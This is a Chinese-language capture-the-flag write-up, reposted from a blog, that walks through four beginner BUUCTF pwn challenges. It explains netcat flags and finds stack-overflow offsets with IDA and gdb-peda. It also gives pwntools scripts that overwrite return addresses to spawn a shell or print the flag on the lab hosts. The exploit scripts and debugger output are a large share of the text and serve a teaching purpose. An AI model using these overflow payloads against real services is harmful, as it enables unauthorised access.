? 【buuctf】pwn入門
pwn學習之路引入 堆疊溢位引入
?test_your_nc

【題目鏈接】 注意到 Ubuntu 18, Linux系統 ,
nc 靶場
nc node3.buuoj.cn 25677
【注】 nc命令詳解

-c shell命令為“-e”;使用/bin/sh來執行 [危險]
-e 檔案名程式在連接后執行 [危險]
-b 允許廣播
-g 網關源路由躍點,最多8個
-G num源路由指標:4,8,12,,,
-i secs 發送的線路和掃描的埠的延遲間隔為1秒
-k 在套接字上設定keepalive選項
-l 監聽模式,用于入站連接
-n 僅數字IP地址,無DNS
-o 檔案十六進制流量轉儲
-p 埠本地埠號
-r 隨機化本地和遠程埠
-q secs 在stdin上的EOF和秒延遲后q秒退出
-s addr地址本地源地址
-T tos 設定服務型別
-t 應答TELNET協商
-u UDP模式
-v verbose(使用兩次可更詳細)
-w 秒連接和最終網路讀取超時
-C 發送CRLF作為行尾
-z 零I/O模式(用于掃描)
連接靶場后,執行 ls 命令,展示該靶場下目錄檔案,
ls

注意到目錄下有個 flag檔案 使用 cat命令進行查看,
cat flag
得到flag
flag{d9aef3cc-8aaf-41e3-8a25-ad2e6500c69a}
?rip

【題目鏈接】
利用file/checksec命令查看檔案
【參考題解】
下載得到 pwn1,利用 file 命令查看,

或者可以采用 checksec ./filename 命令進行探測,//查看當前二進制檔案的指令架構以及采取了哪些保護機制,
對于checksec命令安裝,可以直接選擇安裝pwntools(內置checksec命令)
sudo pip install pwntools
#或者選擇直接下載
git clone https://github.com/slimm609/checksec.sh

具體指令架構和保護機制可參考 該博客
IDA查看pwn1附件
顯而易見(ELF 64-bit),放入IDA中查看,首先 f12+shift 轉到字串視窗,發現 gets system /bin/sh (存在漏洞)
按 please input 進行資料塊跳轉,

之后,按下f5 查看偽代碼:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [rsp+1h] [rbp-Fh]
puts("please input");
gets((__int64)&s, (__int64)argv);
puts(&s);
puts("ok,bye!!!");
return 0;
}
此時注意到 gets函式
gets函式的緩沖區是由用戶本身提供,由于用戶無法指定一次最多可讀入多少位元組,導致此函式存在巨大安全隱患,換句話來說,就是gets若沒有遇到 \n 結束,則會無限讀取,沒有上限,
gets((__int64)&s, (__int64)argv);
雙擊 s ,查看需要多少位元組 ,以此來確定偏移量,

也就是說只需要存入15個位元組地址,就可以get函式回傳地址,
注意到 后面還有db 8 dup(?)
db: 定義位元組型別變數的偽指令
dup(): 重復定義圓括號中指定的初值,次數由前面的數值決定
?: 只分配存盤空間,不指定初值
因此 最后偏移量為 : 15+8 = 23 ,
當然也可以通過 peda 來計算偏移量,
① gdb中 peda插件安裝
git clone https://github.com/longld/peda.git ~/peda echo "source ~/peda/peda.py" >> ~/.gdbinit
②對其進行gdb除錯:
gdb pwn1
③ 生成溢位字符,需保證其長度能覆寫至RIP,執行
pattern create 200命令
gdb-peda$ pattern create 200 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
④ 執行
r或者start命令讓程式運行,//注意start命令執行后,還需執行contin命令,
在please input命令后,將之前生成的溢位字串粘貼上去,gdb-peda$ contin Continuing. please input AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA ok,bye!!! Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x0 RCX: 0x6f ('o') RDX: 0x0 RSI: 0x4052a0 ("ok,bye!!!\nAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...) RDI: 0x7fffff791670 --> 0x0 RBP: 0x412d41414341416e ('nAACAA-A')
注意到 RBP暫存器,也可以計算此時nAACAA-A的偏移量:
執行pattern offset xxxxxx命令,
pattern offset nAACAA-A
這里計算出的偏移量,不需要考慮堆疊平衡,構造playload時,直接與系統呼叫地址相加就可,
√ 通俗辦法:
找到stack復制堆疊頂的字串 // 前四個位元組(64 bits為前8個位元組) 計算偏移量
[------------------------------------stack-------------------------------------] 0000| 0x7fffffffe1a8 ("A(AADAA;AA)AAEAAaAA0AAFAAbA") 0008| 0x7fffffffe1b0 ("AA)AAEAAaAA0AAFAAbA") 0016| 0x7fffffffe1b8 ("aAA0AAFAAbA") 0024| 0x7fffffffe1c0 --> 0x100416241 0032| 0x7fffffffe1c8 --> 0x401142 (<main>: push rbp) 0040| 0x7fffffffe1d0 --> 0x0 0048| 0x7fffffffe1d8 --> 0x3777803596990da 0056| 0x7fffffffe1e0 --> 0x401060 (<_start>: xor ebp,ebp) [------------------------------------------------------------------------------]
執行pattern offset xxxxxx命令,
pattern offset A(AADAA;AA)AAEAAaAA0AAFAAbA
得到偏移量 23
回到 IDA pro中,尋找是否存在 系統呼叫函式,
找到 fun() 函式
int fun()
{
return system("/bin/sh");
}
查看得到 地址為 0x401186,

撰寫相應的 exp
exp撰寫步驟:
from pwn import * #引入pwn庫
p = remote(ip, port) # 輸入對應的ip地址和埠號來連接其他主機的服務
... # 輸入payload來進行操作以拿到程式的shell payload一般等于 偏移量 + 地址
p.interactive() # 反彈shell
因此,撰寫對應 exp:
exp1
from pwn import *
p = remote('node3.buuoj.cn', 27018)
payload = b'a' * 23 + p64(0x401186 + 1)
p.sendline(payload)
p.interactive()
+1 是為了保證堆疊平衡,對于payload :
payload = b'a' * 23 + p64(0x401186) + p64(0x401185) #多加的這部分任意找ret陳述句 都可以
exp 2
from pwn import *
p = remote('node3.buuoj.cn', 27018)
payload = b'a' * 15 + p64(0x401186)
p.sendline(payload)
p.interactive()
注意: 上述 payload中
'a'可以替換成任意字母,
'a'前面的 b是為了防止python3運行時出現以下錯誤, // python2無事,
TypeError: can only concatenate str (not "bytes") to str
pwn環境準備
首先對相應的python/pip版本執行下載命令,即獲取 pwntools,方便 exp運行和進行互動除錯,
(我這里下的是python3的,使用pip3下載)
pip3 install pwn

運行上面編好的exp,保存為 1.py
執行代碼,
python3 1.py
ls
cat flag

得到flag,
flag{2be84b3b-3172-481a-bc4b-dd99c48f0639}
?warmup_csaw_2016

【題目鏈接】
第一步 nc一下靶場: nc node3.buuoj.cn 25333
root@DESKTOP-VUB6KKI:/mnt/c/Users/11145/Desktop# nc node3.buuoj.cn 25333
-Warm Up-
WOW:0x40060d
>
得到 addr:0x40060d
老規矩, file 命令查看一下:

載入IDApro查看,

存在一個 cat flag.txt 命令,因此,直接對其進行 gdb除錯,得到偏移量, 方法同上:
gdb warmup_csaw_2016
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /mnt/c/Users/11145/Desktop/warmup_csaw_2016
-Warm Up-
WOW:0x40060d
>AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7ffffffee650
RBX: 0x0
RCX: 0x7fffff78e980 --> 0xfbad2288
RDX: 0x0
RSI: 0x6022a1 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA\n")
RDI: 0x7fffff791680 --> 0x0
RBP: 0x4141334141644141 ('AAdAA3AA')
得到RBP暫存器中 'AAdAA3AA' ,往該字串后,隨便復制一串,進行偏移量計算:
gdb-peda$ pattern offset IAAeAA4AAJAAf

撰寫exp
from pwn import *
p = remote('node3.buuoj.cn', 25333)
payload = b'x' * 72 + p64(0x40060d)
p.sendline(payload)
p.interactive()
運行exp腳本得到:

得到flag
flag{10d21dd6-9b91-45de-bf83-e01e0083d45e}
?pwn1_sctf_2016

【題目鏈接】
下載得到 pwn1_sctf_2016 檔案
checksec pwn1_sctf_2016

32位,載入IDA,shift+f12 發現 cat flag.txt 命令,跟進,追蹤函式:

如何計算偏移量
① 輸入多個I 查看最多可以轉變多少個 you,
nc node3.buuoj.cn 29866
20個I 可以填滿s溢位,
② 查看 s長度直接計算 I個數,
0000003C s db ? ........................................... +00000000 s db 4 dup(?)
s長為 0x3c 即 60 ,
又因為 fets限制為32個字符,我們必須利用 輸入I 便為 you 這個特性來實作填滿s,
60/3=20也就是說需要 20個 I 方可實作填滿,
注意:db 4 dup(?)這里還有4個位元組記憶體要被占!
尋找地址
找到 get_flag 函式
int get_flag()
{
return system("cat flag.txt");
}

地址為 :08048F0D
撰寫exp
from pwn import *
p = remote('node3.buuoj.cn', 29866)
# 因為最后還有四個位元組需要填充,I代表三個位元組再加上一個即可滿足,
payload = b'I' * 21 + b'x' + p64(0x8048F0D)
#下面這個亦可,直接用x填充4個位元組,
#payload = b'I' * 20 + b'x' * 4 + p64(0x8048F0D)
p.sendline(payload)
p.interactive()

得到flag
flag{e23b1ad6-0af8-4a1f-9007-6e9bf909707c}
【侵權刪】
【轉載請放鏈接】 https://www.cnblogs.com/Jlay/p/pwn_wp1.html
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/449.html
標籤:其他
上一篇:ctf常見原始碼泄露




